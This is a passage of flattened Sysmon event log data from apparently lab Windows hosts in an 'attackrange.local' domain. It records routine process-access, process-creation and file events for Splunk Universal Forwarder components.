Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FF9D3109D0A3063978050686B4E340,SHA256=BF686E0436F74C5538E3354922ABD756BEBB96E030B3F8737C674B75B810F7C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080748Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:02.168{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B04D10F9FD0A0313558B25E3FC1F47,SHA256=07E201DF475A390FDCC4550BCB667D9626599DFB3B3AB4699E2A6FDC00CA4A66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102861Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.548{58E9C193-B176-615A-B101-00000000FC01}60684292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102860Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B176-615A-B101-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102859Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102858Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102857Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102856Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102855Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B176-615A-B101-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102854Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.345{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B176-615A-B101-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102853Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.346{58E9C193-B176-615A-B101-00000000FC01}6068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000102888Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B177-615A-B301-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102887Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102886Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102885Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102884Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102883Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B177-615A-B301-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102882Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.861{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B177-615A-B301-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102881Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.862{58E9C193-B177-615A-B301-00000000FC01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102880Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.642{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B09017D2DEC6D6A5A628F4F9E21A5965,SHA256=649ABA8C4143CBF8DC469C76A594B5A23FAACA419357565E4855F6D5F7AC9AC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080749Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:03.168{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F4E5DCF3DBC6D3BD6380FDED376501B,SHA256=258FE46B8BB47D1EA35823E92D09AD6B95BAE6C066A0047E3B960ADF4C9F1E07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102879Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.502{58E9C193-B177-615A-B201-00000000FC01}71167108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000102878Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.345{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36450B96DCADFF6680508DB0F1B18B7E,SHA256=D13470ACEEE4241B6D4B45D52E600AEC319AD14E36FA7E2CB608354D40092BCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102877Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B177-615A-B201-00000000FC01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102876Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102875Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102874Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102873Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102872Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B177-615A-B201-00000000FC01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102871Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B177-615A-B201-00000000FC01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102870Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:03.252{58E9C193-B177-615A-B201-00000000FC01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102891Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 